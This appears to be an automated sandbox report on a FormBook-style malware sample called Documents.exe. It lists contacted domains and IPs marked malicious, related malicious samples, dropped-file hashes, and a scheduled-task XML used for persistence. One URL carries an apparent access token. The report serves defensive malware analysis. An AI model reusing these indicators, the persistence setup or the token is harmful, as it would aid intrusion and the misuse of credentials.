                                                                  unknown
                                                                  http://www.6822662.xyz/Dating/87c40599507.htmlsystray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://api.particle.io/v1/devices/13300350003473433373737385/digitalread?access_token=Q235ad2c91cacDocuments.exe, uFEeKIucsX.exe.0.drfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=systray.exe, 00000011.00000003.2527658066.00000000074EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://my.101domain.com?utm_campaign=parked-page&utm_medium=referral&utm_source=carpentry.club&utm_systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.6822662.xyz/jiuzhonghuannai/6/systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refersystray.exe, 00000011.00000002.4500910385.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003206000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      high
                                                                      http://www.6822662.xyz/guchuanyizhi/systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchsystray.exe, 00000011.00000003.2527658066.00000000074EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://zrinorem-srumimit.sbs/vWFGbvOdxI.exe, 00000012.00000002.4500346640.00000000039E0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://www.6822662.xyz/Dating/912f40598682.htmlsystray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://www.101domain.com/new_gtld_extensions.htm?utm_campaign=parked-page&utm_medium=referral&utm_ssystray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://park.101datacenter.net/images/vendor-1/com.pngsystray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://www.101domain.com/gmail_email_aliases.htmsystray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://www.6822662.xyz/Dating/068e399928.htmlsystray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://www.101domain.com/domain-registration.htm?utm_campaign=parked-page&utm_medium=referral&utm_ssystray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://www.6822662.xyz/Dating/289d399707.htmlsystray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
IP | Domain | Country | ASN | ASN Name | Malicious
162.0.215.33 | nieuws-july202488.sbs | Canada | 35893 | ACPCA | true
13.248.169.48 | www.hasan.cloud | United States | 16509 | AMAZON-02US | true
199.192.23.123 | www.learnnow.info | United States | 22612 | NAMECHEAP-NETUS | true
104.18.73.116 | www.losmason.shop | United States | 13335 | CLOUDFLARENETUS | true
121.43.155.35 | www.lingdianyun29.xyz | China | 37963 | CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd | true
75.2.103.23 | www.innovationpulse.tech | United States | 16509 | AMAZON-02US | true
161.97.142.144 | www.030002449.xyz | United States | 51167 | CONTABODE | true
192.185.147.100 | hayaniya.org | United States | 26337 | OIS1US | true
52.60.87.163 | www.carpentry.club | United States | 16509 | AMAZON-02US | true
185.106.208.3 | holytur.net | Turkey | 42846 | GUZELHOSTINGGNETINTERNETTELEKOMUNIKASYONASTR | false
103.249.106.91 | www.6822662.xyz | China | 137443 | ANCHGLOBAL-AS-APAnchnetAsiaLimitedHK | true
3.33.130.190 | duskgazes.work | United States | 8987 | AMAZONEXPANSIONGB | true
172.67.222.69 | www.zrinorem-srumimit.sbs | United States | 13335 | CLOUDFLARENETUS | true
                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                        Analysis ID:1564384
                                                                        Start date and time:2024-11-28 09:12:15 +01:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 10m 59s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Number of analysed new started processes analysed:19
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:2
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:Documents.exe
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.spyw.evad.winEXE@23/16@14/13
                                                                        EGA Information:
                                                                        • Successful, ratio: 80%
                                                                        HCA Information:
                                                                        • Successful, ratio: 96%
                                                                        • Number of executed functions: 94
                                                                        • Number of non-executed functions: 307
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .exe
                                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, fe3cr.delivery.mp.microsoft.com
                                                                        • Execution Graph export aborted for target vWFGbvOdxI.exe, PID 1788 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                        • VT rate limit hit for: Documents.exe
Time | Type | Description
03:13:06 | API Interceptor | 2x Sleep call for process: Documents.exe modified
03:13:14 | API Interceptor | 43x Sleep call for process: powershell.exe modified
03:13:18 | API Interceptor | 2x Sleep call for process: uFEeKIucsX.exe modified
03:14:12 | API Interceptor | 9968994x Sleep call for process: systray.exe modified
09:13:14 | Task Scheduler | Run new task: uFEeKIucsX path: C:\Users\user\AppData\Roaming\uFEeKIucsX.exe
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                        162.0.215.33dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeGet hashmaliciousFormBookBrowse
                                                                        • www.nieuws-july202541.sbs/0bvv/
                                                                        QUOTE2342534.exeGet hashmaliciousFormBookBrowse
                                                                        • www.nieuws-july202491.sbs/4bpc/
                                                                        r0000000NT_PDF.exeGet hashmaliciousFormBookBrowse
                                                                        • www.nieuws-july202491.sbs/rq5n/
                                                                        rInvoiceCM60916_xlx.exeGet hashmaliciousFormBookBrowse
                                                                        • www.nieuws-july202491.sbs/rq5n/
                                                                        z1SupplyInvoiceCM60916_Doc.exeGet hashmaliciousFormBookBrowse
                                                                        • www.nieuws-july202491.sbs/rq5n/
                                                                        13.248.169.48CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                        • www.egyshare.xyz/lp5b/
                                                                        attached order.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                        • www.aktmarket.xyz/wb7v/
                                                                        file.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                        • www.gupiao.bet/t3a1/
                                                                        DO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                        • www.krshop.shop/grhe/
                                                                        Fi#U015f.exeGet hashmaliciousFormBookBrowse
                                                                        • www.a1shop.shop/5cnx/
                                                                        ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                        • www.tals.xyz/tj5o/
                                                                        santi.exeGet hashmaliciousFormBookBrowse
                                                                        • www.lirio.shop/qp0h/
                                                                        PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                                        • www.optimismbank.xyz/98j3/
                                                                        CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                        • www.tals.xyz/cpgr/
                                                                        VSP469620.exeGet hashmaliciousFormBookBrowse
                                                                        • www.heliopsis.xyz/cclj/?9HaD=8+p9jI+W8p4gGfkrJ06IbG7GVrDrFE39Gbevi7MMoG/mxV0OJ3bBQ6ZfzHGiIebJDzxdJU835govK3Wq3/2OXcUb6pzjLf8wiqFw/QHcYMK4syzjiA==&wdv4=1RD4
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                        www.losmason.shopsanti.exeGet hashmaliciousFormBookBrowse
                                                                        • 104.18.73.116
                                                                        www.hasan.cloudfile.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                        • 13.248.169.48
                                                                        www.learnnow.infofile.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                        • 199.192.23.123
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                        NAMECHEAP-NETUSPayment_Slip.pdf.exeGet hashmaliciousUnknownBrowse
                                                                        • 198.54.126.126
                                                                        Banorte_Aviso_de_Pago_pdf.exeGet hashmaliciousUnknownBrowse
                                                                        • 198.54.126.126
                                                                        Payment_Slip.pdf.exeGet hashmaliciousUnknownBrowse
                                                                        • 198.54.126.126
                                                                        Banorte_Aviso_de_Pago_pdf.exeGet hashmaliciousUnknownBrowse
                                                                        • 198.54.126.126
                                                                        nklsh4.elfGet hashmaliciousUnknownBrowse
                                                                        • 162.0.234.192
                                                                        FATURA.exeGet hashmaliciousFormBookBrowse
                                                                        • 162.0.238.246
                                                                        file.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                        • 199.192.23.123
                                                                        https://app.useblocks.io/getemail/48034?secret_hash=d1541dc5be135b2d0f39c0711cecbe46&raw=trueGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                        • 162.0.231.89
                                                                        https://kkinternational.co.uk/Get hashmaliciousHTMLPhisherBrowse
                                                                        • 185.61.154.40
                                                                        FACTURA 24V70 VINS.exeGet hashmaliciousFormBookBrowse
                                                                        • 162.0.229.222
                                                                        ACPCAoS6KsQIqJxe038Y.exeGet hashmaliciousDarkCloud, PureLog StealerBrowse
                                                                        • 162.55.60.2
                                                                        pbnpvwfhco.elfGet hashmaliciousUnknownBrowse
                                                                        • 162.65.144.8
                                                                        https://michiganchronicle.com/philanthropy-under-siege-how-the-fight-against-the-fearless-fund-threatens-black-womens-progress-in-detroit/Get hashmaliciousUnknownBrowse
                                                                        • 162.55.246.61
                                                                        mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                        • 162.52.56.205
                                                                        nabm68k.elfGet hashmaliciousUnknownBrowse
                                                                        • 162.48.203.221
                                                                        FATURA.exeGet hashmaliciousFormBookBrowse
                                                                        • 162.0.209.213
                                                                        loligang.spc.elfGet hashmaliciousMiraiBrowse
                                                                        • 162.10.7.182
                                                                        Purchase Order AB013058.PDF.exeGet hashmaliciousDarkCloud, PureLog StealerBrowse
                                                                        • 162.55.60.2
                                                                        MSM8C42iAN.exeGet hashmaliciousDarkCloudBrowse
                                                                        • 162.55.60.2
                                                                        wMy37vlfvz.exeGet hashmaliciousDarkCloudBrowse
                                                                        • 162.55.60.2
                                                                        AMAZON-02USnabmips.elfGet hashmaliciousUnknownBrowse
                                                                        • 3.168.247.140
                                                                        nabsh4.elfGet hashmaliciousUnknownBrowse
                                                                        • 44.226.239.16
                                                                        nabarm.elfGet hashmaliciousUnknownBrowse
                                                                        • 54.126.138.72
                                                                        nabmpsl.elfGet hashmaliciousUnknownBrowse
                                                                        • 44.233.171.208
                                                                        nabx86.elfGet hashmaliciousUnknownBrowse
                                                                        • 54.171.230.55
                                                                        invoice-1664809283.pdf (1).jsGet hashmaliciousRHADAMANTHYSBrowse
                                                                        • 185.166.143.50
                                                                        invoice-1664809283.pdf .jsGet hashmaliciousRHADAMANTHYSBrowse
                                                                        • 185.166.143.49
                                                                        loligang.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                        • 18.135.214.149
                                                                        botx.arm6.elfGet hashmaliciousMiraiBrowse
                                                                        • 54.232.32.230
                                                                        botx.x86.elfGet hashmaliciousMiraiBrowse
                                                                        • 18.197.218.104
                                                                        Process:C:\Users\user\Desktop\Documents.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):1216
                                                                        Entropy (8bit):5.34331486778365
                                                                        Encrypted:false
                                                                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                        MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                        SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                        SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                        SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                        Malicious:true
                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                        Process:C:\Users\user\AppData\Roaming\uFEeKIucsX.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):1216
                                                                        Entropy (8bit):5.34331486778365
                                                                        Encrypted:false
                                                                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                        MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                        SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                        SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                        SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                        Malicious:false
                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):2232
                                                                        Entropy (8bit):5.379909843762687
                                                                        Encrypted:false
                                                                        SSDEEP:48:BWSU4xympgv4RIoUP7gZ9tK8NPZHUx7u1iMugeC/ZPUyus:BLHxv2IfLZ2KRH6Oug8s
                                                                        MD5:5ED93D92EEA0E547284B97AD38FEDAFF
                                                                        SHA1:D3A57A1AE4C91873D51144CFFD69C8AEB27B7F67
                                                                        SHA-256:381012991B65EDA1C67E5DD4E66550FE3A4D227A3BD755ED68D10F8F1356D649
                                                                        SHA-512:4FA84B90455DE3D10BB007BF2581658FE6F4A5D644A5960B1E8D038FEC5C95DAC339D19BAF01A930581671886628AB121B7C545A1CAEEC3CEF6AD81D6F1B1064
                                                                        Malicious:false
                                                                        Process:C:\Windows\SysWOW64\systray.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                        Category:dropped
                                                                        Size (bytes):196608
                                                                        Entropy (8bit):1.121297215059106
                                                                        Encrypted:false
                                                                        SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                        MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                        SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                        SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                        SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Users\user\Desktop\Documents.exe
                                                                        File Type:XML 1.0 document, ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):1583
                                                                        Entropy (8bit):5.105402202780381
                                                                        Encrypted:false
                                                                        SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtWNxvn:cgergYrFdOFzOzN33ODOiDdKrsuT4v
                                                                        MD5:F792F12263356811E7EC07A7A9D1D135
                                                                        SHA1:2EED032342D1ED944E7184243E3934FA2D042184
                                                                        SHA-256:F72A4D87B2A12D8A59F945EEED4BA453238905C1486501A99B9BE8924125A5AC
                                                                        SHA-512:DBAE75E3310A6AE15BA022686A4AE9E584182FE0D0688A3C116334EEB00282B44CE9A00B210CE9F4B8221B218AF6D3C6C300AB7ED81DBD87D15173332C955303
                                                                        Malicious:true
                                                                        Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                                                                        Process:C:\Users\user\AppData\Roaming\uFEeKIucsX.exe
                                                                        File Type:XML 1.0 document, ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):1583
                                                                        Entropy (8bit):5.105402202780381
                                                                        Encrypted:false
                                                                        SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtWNxvn:cgergYrFdOFzOzN33ODOiDdKrsuT4v
                                                                        MD5:F792F12263356811E7EC07A7A9D1D135
                                                                        SHA1:2EED032342D1ED944E7184243E3934FA2D042184
                                                                        SHA-256:F72A4D87B2A12D8A59F945EEED4BA453238905C1486501A99B9BE8924125A5AC
                                                                        SHA-512:DBAE75E3310A6AE15BA022686A4AE9E584182FE0D0688A3C116334EEB00282B44CE9A00B210CE9F4B8221B218AF6D3C6C300AB7ED81DBD87D15173332C955303
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                                                                        Process:C:\Users\user\Desktop\Documents.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):929800
                                                                        Entropy (8bit):7.84469641614054
                                                                        Encrypted:false
                                                                        SSDEEP:24576:4t2xjPLCnYn28/zBe7Rw4/apNbasfpKHSnfry:4AcnY28/9MRzmskpKHSnfW
                                                                        MD5:0C0B6ED60E0309998DA4AE71469F1D84
                                                                        SHA1:030176B42AAC8F2FD5E0358E817491D3C334A686
                                                                        SHA-256:83B760B0B764A209333A2B903015FF3F6DF831FAF20BE20B836563C54E3370B1
                                                                        SHA-512:7F484ECE6A2B6910366BDD50EA14ABF61034BBB22A540378EFB04D48CFD68D021FA8DD5F7F3A27DF109090F6B4935CF019CA1251565B0E585F39AFAAF1A5442F
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        • Antivirus: ReversingLabs, Detection: 24%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Gg..............0......\.......... ........@.. .......................@............@.................................x...O........Y...............6... ....................................................... ............... ..H............text...P.... ...................... ..`.rsrc....Y.......Z..................@..@.reloc....... ......................@..B........................H.......P<..x5......$....q...G..........................................z..}.....(........}.....(.....*..*...0............{.....+..*&...}....*...0............{....o.....+..*....0..B.........{...., .{....o....,..(....o..........+....,...(....o....oB.....*...0..B.........{...., .{....o....,..(....o..........+....,...(....o....oD.....*..r...p.{....%-.&.+.o....(....(....&*..0..E.........{....o.........,1...}.....(.....{....o ...o!.....(....o....oB.....*>..{.....o"....**...(#....*
                                                                        Process:C:\Users\user\Desktop\Documents.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):26
                                                                        Entropy (8bit):3.95006375643621
                                                                        Encrypted:false
                                                                        SSDEEP:3:ggPYV:rPYV
                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                        Malicious:true
                                                                        Preview:[ZoneTransfer]....ZoneId=0
                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Entropy (8bit):7.84469641614054
                                                                        TrID:
                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                        • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                        File name:Documents.exe
                                                                        File size:929'800 bytes
                                                                        MD5:0c0b6ed60e0309998da4ae71469f1d84
                                                                        SHA1:030176b42aac8f2fd5e0358e817491d3c334a686
                                                                        SHA256:83b760b0b764a209333a2b903015ff3f6df831faf20be20b836563c54e3370b1
                                                                        SHA512:7f484ece6a2b6910366bdd50ea14abf61034bbb22a540378efb04d48cfd68d021fa8dd5f7f3a27df109090f6b4935cf019ca1251565b0e585f39afaaf1a5442f
                                                                        SSDEEP:24576:4t2xjPLCnYn28/zBe7Rw4/apNbasfpKHSnfry:4AcnY28/9MRzmskpKHSnfW
